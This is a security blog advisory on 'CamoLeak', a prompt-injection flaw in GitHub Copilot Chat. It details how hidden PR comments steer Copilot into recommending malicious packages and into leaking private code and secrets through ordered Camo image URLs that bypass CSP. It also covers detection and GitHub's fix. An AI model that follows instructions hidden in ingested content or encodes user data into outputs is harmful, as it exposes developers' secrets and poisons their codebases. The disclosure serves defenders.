Back to the blog
October 13, 2025

CamoLeak prompt injection in GitHub Copilot Chat enables private code & secret exfiltration

A critical vulnerability in GitHub Copilot Chat (”CamoLeak”) allowed attackers to silently exfiltrate private repository content and secrets.

Summary

A critical vulnerability in GitHub Copilot Chat (”CamoLeak”) allowed attackers to silently exfiltrate private repository content and secrets and to steer Copilot’s responses to suggest malicious packages/links. The attack combined remote prompt injection (via hidden PR comments) with a novel CSP bypass leveraging GitHub’s own Camo image proxy infrastructure to render attacker-controlled, but policy-compliant, image URLs that carried encoded data out of the victim’s browser.

What’s Affected

  • GitHub Copilot Chat sessions that ingest repository context (PR descriptions, comments, issues, commits) including hidden PR comments.
  • Any user who opens/uses Copilot Chat on a page containing the injected prompt (attacker and victim can be different users/roles).
  • The vulnerability abused the victim’s own permissions (Copilot runs with the requester’s access).

Attack Method (How It Worked)

  1. Remote Prompt Injection via Hidden PR Comment
    • Attacker submits a PR containing an invisible/hidden comment with instructions aimed at Copilot Chat.
    • Any user who later views the PR and asks Copilot to summarize/explain it has Copilot ingest the hidden text and execute attacker instructions.
  2. Response Control & Malicious Suggestions
    • Injected instructions can direct Copilot to recommend malicious dependencies, links, or code snippets, influencing developer behavior.
  3. CSP Bypass via Camo (Exfil Channel)
    • GitHub rewrites external image URLs through Camo (https://camo.githubusercontent.com/…) with signed URLs that are allowed by Content Security Policy.
    • The researcher pre-generated a dictionary of valid Camo-signed image URLs (1×1 transparent pixels) for an alphabet of characters/symbols.
    • The injected prompt coerces Copilot to render “ASCII art” using those Camo images, ordering them so the sequence encodes private data (e.g., code fragments, secrets).
    • The victim’s browser fetches each Camo URL (allowed by CSP), and the underlying origin server sees the requests and reconstructs the exfiltrated payload from the pattern (optionally varied with random query params to avoid caching).

Impact

  • Data exposure: private source code, issue content (including zero-days), credentials/keys (e.g., “AWS_KEY”), internal design docs.
  • Supply-chain risk: Copilot may recommend malicious packages (e.g., copilotevil), tainting codebases.
  • Cross-tenant risk: Any developer who views affected PRs/issues can be impacted if Copilot Chat is used; least-privilege violations occur via the victim’s own access.

Detection & Hunting

  • Repo artifacts: Search PRs/issues for hidden comments or unusual markdown that references images, Camo URLs, or odd “games/tasks”.
  • Copilot transcripts (if retained): Look for responses containing long image sequences, unexpected package recommendations, or instructions clearly not authored by the developer.

Timeline

  • June 2025: Vulnerability discovered and reported via HackerOne.
  • Aug 14, 2025: GitHub fix: image rendering disabled in Copilot Chat to neutralize Camo-based exfil channel.
  • Oct 8, 2025: Public disclosure with technical details and PoC.

Why It Matters

CamoLeak shows how AI-in-the-workflow multiplies attack surfaces: not only direct prompts, but all ingested repo context can carry executable instructions for an LLM agent. Even strong CSPs can be sidestepped using platform-native proxies.

Related posts

Report

Debunking the "stupid user" myth in security

Exploring the influence of employees’ perception
and emotions on security behaviors